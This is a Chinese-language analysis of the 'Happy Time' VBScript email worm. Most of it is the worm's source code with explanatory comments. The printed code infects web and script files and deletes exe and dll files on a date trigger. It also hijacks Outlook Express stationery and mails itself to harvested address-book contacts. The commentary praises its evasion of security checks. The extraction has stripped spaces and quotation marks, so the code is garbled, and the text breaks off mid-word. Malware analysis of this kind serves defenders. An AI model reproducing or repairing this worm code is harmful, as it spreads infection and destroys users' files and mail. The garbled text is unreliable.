歡樂時光代碼分析

1、 PAGE PAGE 34“歡樂時光”其實就是利用了超文本郵件中可以夾帶腳本語言的特點而棋高一招的。我們知道，郵件的格式可以有兩種：純文本和超文本。超文本（HTML）功能強大就不用多說了，它可以內嵌數種腳本語言，常見的就是VBScript和JavaScript。“歡樂時光”在超文本中夾帶的就是VBS。從源代碼中可以看得出來，該作者很可能是長期從事網絡編程的高手，他對VBS的認識可謂精通，使用的許多技術細節(jié)都鮮為人知，尤其是利用了類型庫（TypeLibrary）成功地避開了安全審核的手段更是令人嘆為觀止。下面讓我們來看看它藏在快樂的外衣下的是什么吧！*歡樂時光*RemIamsorry!happy

2、timeOnErrorResumeNextMload以上為病毒入口，并加上Iamsorry!happytime的注釋，以表明此文件已被感染過。Submload()OnErrorResumeNextmPath=Grf()SetOs=CreateObject(Scriptlet.TypeLib)SetOh=CreateObject(Shell.Application)建立枚舉對象，避開了安全審核IfIsHTMLThen調用IsHtml函數，如果是Html，就小寫mURL=LCase(document.Location)IfmPath=ThenOs.ResetOs.Path=C:Help.htmOs

3、.Doc=Lhtml()Os.Write()如果mPath為空，就在C盤下生成Help.htmIhtml=超文本的內容，并指向C:Help.HtmCalldocument.Body.insertAdjacentHTML(AfterBegin，Ihtml)ElseIfIv(mPath，Help.vbs)ThensetIntervalRt()，10000Elsem=htaIfLCase(m)=Right(mURL，Len(m)Thenid=setTimeout(mclose()，1)設置超時條件mainElseOs.Reset()Os.Path=mPath&Help.htaOs.Doc=Lhtml

4、()Os.write()IvmPath，Help.hta生成Help.htaEndIfEndIfEndIfElseMain都不是，就執(zhí)行main函數EndIfEndSub*以下為主函數，太長了！Submain()OnErrorResumeNextSetOf=CreateObject(Scripting.FileSystemObject)不用說，創(chuàng)建FileSystemObject對象啦SetOd=CreateObject(Scripting.Dictionary)創(chuàng)建Dictionary對象，用來保存數據鍵和項目對，它實際上是一個比較開放的數組Od.Addhtml，1100Od.Addvbs，

5、0100Od.Addhtm，1100Od.Addasp，0010向Dictionary對象添加要感染的項目對Ks=HKEY_CURRENT_USERSoftware使用變量以減少代碼長度Ds=Grf()Cs=Gsf()IfIsVbsThen如果是VBSIfOf.FileExists(C:help.htm)ThenOf.DeleteFile(C:help.htm)如果c:help.htm存在，就刪掉，消滅遺留的痕跡EndIfKey=CInt(Month(Date)+Day(Date)IfKey=13Then如果月與日之和為13（這也是它變種多的原因將13改為其他數字即可）Od.RemoveAll

6、Od.Addexe，0001Od.Adddll，0001就清空Dictionary數組，并將exe、dll加入Dictionary對象，以備刪除之用EndIfCn=Rg(Ks&HelpCount)讀注冊表中的HKEY_CURRENT_USERSoftwareHelpCount鍵值IfCn=ThenCn=1如果Count為0，就設為1EndIfRwKs&HelpCount，Cn+1添加HKEY_CURRENT_USERSoftwareHelpCount鍵值，值為2f1=Rg(Ks&HelpFileName)再讀HKEY_CURRENT_USERSoftwareHelpFileName鍵值f2=F

7、Next(Of，Od，f1)得到該文件的文件名fext=GetExt(Of，Od，f2)得到該文件擴展名的代號RwKs&HelpFileName，f2添加鍵值IfIsDel(fext)Then如果擴展名代號的第四個字符為1即0001(exe、dll)f3=f2儲存文件名f2=FNext(Of，Od，f2)得到文件的文件名？RwKs&HelpFileName，f2寫注冊表Of.DeleteFilef3刪除文件ElseIfLCase(WScript.ScriptFullname)LCase(f2)Then如果不是集合中的文件FwOf，f2，fextEndIfEndIfIf(CInt(Cn)Mod3

8、66)=0ThenIf(CInt(Second(Time)Mod2)=0Then使用Cint函數強制執(zhí)行轉換，并發(fā)郵件TsendElseadds=OgMsend(adds)EndIfEndIfwp=Rg(HKEY_CURRENT_USERControlPaneldesktopwallPaper)IfRg(Ks&HelpwallPaper)wpOrwp=Then比較桌面墻紙是否已改變Ifwp=Thenn1=n3=Cs&Help.htmElsemP=Of.GetFile(wp).ParentFoldern1=Of.GetFileName(wp)n2=Of.GetBaseName(wp)n3=Cs&

9、n2&.htmEndIfSetpfc=Of.CreateTextFile(n3，True)mt=Sa(1100)創(chuàng)建超文本pfc.Write&mt超文本的內容pfc.CloseRwKs&HelpwallPaper，n3RwHKEY_CURRENT_USERControlPaneldesktopwallPaper，n3將帶毒的超文本設置成活動桌面EndIfElseSetfc=Of.CreateTextFile(Ds&Help.vbs，True)fc.WriteSa(0100)創(chuàng)建vbs文件fc.Closebf=Cs&Untitled.htmSetfc2=Of.CreateTextFile(bf，

10、True)fc2.WriteLhtmlfc2.Close創(chuàng)建windows下的untitled.htmoeid=Rg(HKEY_CURRENT_USERIdentitiesDefaultUserID)oe=HKEY_CURRENT_USERIdentities&oeid&SoftwareMicrosoftOutlookExpress5.0MailMSH=oe&MessageSendHTMLCUS=oe&ComposeUseStationerySN=oe&StationeryNameRwMSH，1RwCUS，1RwSN，bf在Hkey_Current_UserIdentitiesAECF6CA3

11、-9614-4AF4-AEF2-CT63FE9D97A4SoftwareMicrosoftOutlookExpress5.0Mail下添加三個鍵值MessageSendHTML、ComposeUseStationery和StationeryName，前兩個的值為1，后一個指向windowsuntitled.htmWeb=Cs&WEBSetgf=Of.GetFolder(Web).Files得到windowsweb文件夾里的文件Od.Addhtt，1100向Dictionary里添加htt項目對ForEachmIngf遍歷windowsweb下的每一個文件fext=GetExt(Of，Od，m)

12、得到每個文件的擴展名IffextThen如果擴展名不為空，則FwOf，m，fextEndIfNextEndIfEndSub*Submclose()document.WriteIamsorry!寫入Iamsorry，并關閉。以此作為感染與否的標記window.CloseEndSub*SubFw(Of，S，n)此時S為文件名，n為文件擴展名Dimfc，fc2，m，mmail，mtOnErrorResumeNextSetfc=Of.OpenTextFile(S，1)只讀模式打開該文件mt=fc.ReadAll讀入全部文件流fc.Close關閉文件IfNotSc(mt)Then如果未感染過mmail=

13、Ml(mt)mt=Sa(n)Setfc2=Of.OpenTextFile(S，8)打開文件并在文件末尾進行寫愛作fc2.Writemtfc2.CloseMsend(mmail)發(fā)帶毒郵件EndIfEndSub*FunctionSc(S)mN=RemIamsorry!happytimeIfInStr(S，mN)0Then如果讀入的文件流中有RemIamsorry!happytimeSc=TrueElseSc=False表示已感染過，返回True，否則為FalseEndIfEndFunction*FunctionFNext(Of，Od，S)Dimfpath，fname，fext，T，gfOnErr

14、orResumeNextfname=T=False初始化變量IfOf.FileExists(S)Then如果S存在于當前文件夾中fpath=Of.GetFile(S).ParentFolder得到文件的父目錄名fname=S得到文件名ElseIfOf.FolderExists(S)Then不存在于當前文件夾中，則得到目錄名fpath=ST=TrueElsefpath=Dnext(Of，)得到當前盤符即根目錄EndIfDoWhileTrueSetgf=Of.GetFolder(fpath).Files得到當前目錄下的所有文件對象ForEachmIngf遍歷每個文件IfTThenIfGetExt(

15、Of，Od，m)Then如果該文件是文件集合中的一員FNext=m則返回該文件名，供調用的函數或過程使用感染或刪除之ExitFunctionEndIfElseIfLCase(m)=LCase(fname)Orfname=Then如果沒文件T=TrueEndIfNextfpath=Pnext(Of，fpath)LoopEndFunction*FunctionPnext(Of，S)OnErrorResumeNextDimPpath，Npath，gp，pn，T，mT=FalseIfOf.FolderExists(S)Then如果如果指定的文件夾存在Setgp=Of.GetFolder(S).SubF

16、olders就得到子目錄數pn=gp.CountIfpn=0Then如果沒子目錄Ppath=LCase(S)Npath=LCase(Of.GetParentFolderName(S)得到父目錄的小寫形式T=TrueElseNpath=LCase(S)有子目錄，得到其小寫形式的集合EndIfDoWhileNotErForEachpnInOf.GetFolder(Npath).SubFolders得到子目錄下的子目錄IfTThenIfPpath=LCase(pn)ThenT=FalseEndIfElsePnext=LCase(pn)ExitFunctionEndIfNextT=TruePpath=

17、LCase(Npath)將字符串轉化成小寫Npath=Of.GetParentFolderName(Npath)IfOf.GetFolder(Ppath).IsRootFolderThen如果是根目錄m=Of.GetDriveName(Ppath)就得到分區(qū)符Pnext=Dnext(Of，m)ExitFunctionEndIfLoopEndIfEndFunction*FunctionDnext(Of，S)Dimdc，n，d，T，mOnErrorResumeNextT=Falsem=Setdc=Of.Drives得到所有的驅動器盤符ForEachdIndc遍歷每個驅動器Ifd.DriveType

18、=2Ord.DriveType=3Then如果是網絡盤或本地盤IfTThenDnext=dExitFunction如果是False，就返回當前盤，并退出本函數ElseIfLCase(S)=LCase(d)Then如果是True且盤符相同，就令T為TrueT=TrueEndIfIfm=Then如果m為空，就將盤符付給mm=dEndIfEndIfEndIfNextDnext=m返回盤符EndFunction*FunctionGetExt(Of，Od，S)DimfextOnErrorResumeNextfext=LCase(Of.GetExtensionName(S)返回該文件擴展名的小寫GetEx

19、t=Od.Item(fext)返回Dictionary對象中指定的key對應的item即0001(exe)等EndFunction*SubRw(k，v)寫注冊表DimROnErrorResumeNextSetR=CreateObject(WScript.Shell)創(chuàng)建對象R.RegWritek，vEndSub*FunctionRg(v)讀注冊表DimROnErrorResumeNextSetR=CreateObject(WScript.Shell)創(chuàng)建對象Rg=R.RegRead(v)EndFunction*FunctionIsVbs()此函數判斷是不是VBS文件DimErrTestOnEr

20、rorResumeNextErrTest=WScript.ScriptFullnameIfErrThen如果出錯，則不是VBSIsVbs=FalseElseIsVbs=TrueEndIfEndFunction*FunctionIsHTML()此函數判斷是不是Html文件DimErrTestOnErrorResumeNextErrTest=document.LocationIfErThenIsHTML=False如果出錯，則不是超文本ElseIsHTML=TrueEndIfEndFunction*FunctionIsMail(S)此函數判斷是不是郵件地址Dimm1，m2IsMail=FalseI

21、fInStr(S，vbCrLf)=0Then返回vbCrLf在S中第一次出現的位置，vbCrLf是換行符m1=InStr(S，)m2=InStr(S，.)Ifm10Andm1m2Then如果有“”符號且“”在“.之前，則是郵件地址IsMail=TrueEndIfEndIfEndFunction*FunctionGsf()得到windows目錄DimOf，mOnErrorResumeNextSetOf=CreateObject(Scripting.FileSystemObject)創(chuàng)建FileSystemObject對象m=Of.GetSpecialFolder(0)得到特殊目錄Windows、

22、System和Temp目錄IfErThen如果失敗，返回C:Gsf=C:Else若正常，則返回%Windows%Gsf=mEndIfEndFunction*FunctionLhtml()寫入超文本的內容，其中vbCrLf是換行符Lhtml=Help&Lscript(Lvbs()&vbCrLf&_EndFunction*FunctionLscript(S)寫入vbscript的聲明Lscript=&vbCrLf&_S&EndFunction*FunctionSl(S1，S2，n)Diml1，l2，l3，il1=Len(S1)得到文件流的長度l2=Len(S2)得到mailto:的長度i=InSt

23、r(S1，S2)在文件流中查找mailto:第一次出現的位置值為一個數Ifi0Then找到則進行字符串愛作l3=i+l2-1Ifn=0ThenSl=Left(S1，i-1)ElseIfn=1ThenSl=Right(S1，l1-l3)EndIfElseSl=EndIfEndFunction*FunctionOg()得到WAB（通訊簿）中的郵件地址Dimi，n，m()，Om，OoSetOo=CreateObject(Outlook.Application)創(chuàng)建Outlook應用程序對象，Outlook和OutlookExpress都跑不掉啦！SetOm=Oo.GetNamespace(MAPI)

24、.GetDefaultFolder(10).Itemsn=Om.CountReDimm(n)Fori=1Tonm(i-1)=Om.Item(i).Email1Address得到每個WAB中的郵件地址NextOg=mEndFunction*SubTsend()發(fā)帶毒郵件DimOd，MS，MM，a，mSetOd=CreateObject(Scripting.Dictionary)MConnectMS，MMMM.FetchSorted=TrueMM.FetchFori=0ToMM.MsgCount-1MM.MsgIndex=ia=MM.MsgOrigAddressIfOd.Item(a)=ThenO

25、d.Item(a)=MM.MsgSubjectEndIfNextForEachmInOd.KeysMM.ComposeMM.MsgSubject=Fw:&Od.Item(m)設置郵件標題MM.RecipAddress=m此郵件的當前的目標郵件地址MM.AttachmentPathName=Gsf&Untitled.htm添加附件WindowsUntitled.htmMM.Send發(fā)送！NextMS.SignOffEndSub*FunctionEr()設置的錯誤陷阱，避免程序崩潰，嚴謹的風格值得學習IfErr.Number=0ThenEr=FalseElseErr.ClearEr=TrueEndIfEndFunction*Funct